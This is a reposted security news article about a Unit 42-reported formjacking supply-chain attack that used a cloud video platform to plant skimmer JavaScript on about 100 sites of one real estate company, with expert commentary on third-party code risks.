Real estate company

Formjacking campaign leverages cloud video platform to target real estate company

Realtors leave a home for sale during a broker’s open house on April 16, 2019 in San Francisco, California. (Photo by Justin Sullivan/Getty Images)

Researchers reported on Monday that they uncovered a supply chain attack that used an undisclosed cloud video platform to deliver the same formjacking (skimming) campaign to around 100 real estate sites.

In a Palo Alto Unit 42 blog post, researchers said cybercriminals injected malicious JavaScript code to hijack a website and take over the functionality of the site’s HTML form page to collect data sensitive. For the attacks covered by the research, the JavaScript codes were injected into the video, so that when others import the video, their websites are also embedded with skimmer codes.

After the site analysis, Unit 42 found that all of the compromised sites belonged to a single parent company. Palo Alto has since worked closely with the cloud video platform and real estate company to help them remove the malware.

“We are publishing this article to alert organizations and Internet users to the potential for supply chain attacks to infect legitimate websites without the knowledge of these organizations,” the researchers said.

By injecting malicious code into front-end web pages, formjacking campaigns are a common way for threat actors to steal sensitive data, explained Hank Schless, senior director of security solutions at Lookout. Schless said that because the threat actor can customize the malicious form, it could easily slip into a field that is tangentially aligned with the actual intent of the host website. For example, Schless said in this incident with the real estate site, the attacker could ask for all basic information, but add a line for the user’s social security number to validate their credit.

“This same tactic could be used to sweep employees’ corporate login credentials,” Schless said. “Creating a fake login form would be as easy as any other data collection form. Regardless of intent, the biggest lesson from this incident is that it is necessary to know who has access to your based assets. on the cloud and how users interact with the data Whether it’s a front-end web page or sensitive data stored in your back-end infrastructure, visibility is paramount.

Jake Williams, co-founder and CTO of BreachQuest, said that whenever a malicious actor can insert JavaScript into a website visited by a victim, the malicious actor effectively has full control over the browser’s actions on the site. As such, Williams said the impact depends on the types of sites into which threat actors can embed their malicious code. As the Unit 42 researchers noted, formjacking attacks typically divert or copy data intended for submission to the legitimate site to a threat actor. controlled server.

“So the impact of a formjacking attack in most cases will be guided by the types of data legitimately submitted to the site,” Williams said. “In the specific case where threat actors were targeting real estate sites and where users would typically not provide much sensitive information, the specific impact of a formjacking attack is unclear. However, we can imagine situations where a real estate site might be linked to mortgage lenders. Once the threat actor injects JavaScript into the website through the video player, they control where these links go and can leverage them to collect more sensitive information from visitors. Due to the characterization of the original real estate victim, tricking users into providing high-impact data on the website seems unlikely.

Chris Olson, managing director of The Media Trust, added that formjacking attacks are usually not one-off, isolated incidents. He said more often they represent large-scale attacks that leverage third-party plugins to affect thousands of websites at once.

“Third-party code is the real common denominator behind most web attacks: no matter what language it’s built on, malicious actors will always find vulnerabilities to exploit,” Olson said. “As the Unit 42 article demonstrates, form hijacking attacks are often obfuscated to evade detection by common blocking tools. In our experience, they are also often polymorphic, changing or disappearing between sessions to dodge even advanced malware scanners. Organizations cannot rely solely on automated solutions, they must control their digital providers and constantly monitor the activity of their online domains. »

Source link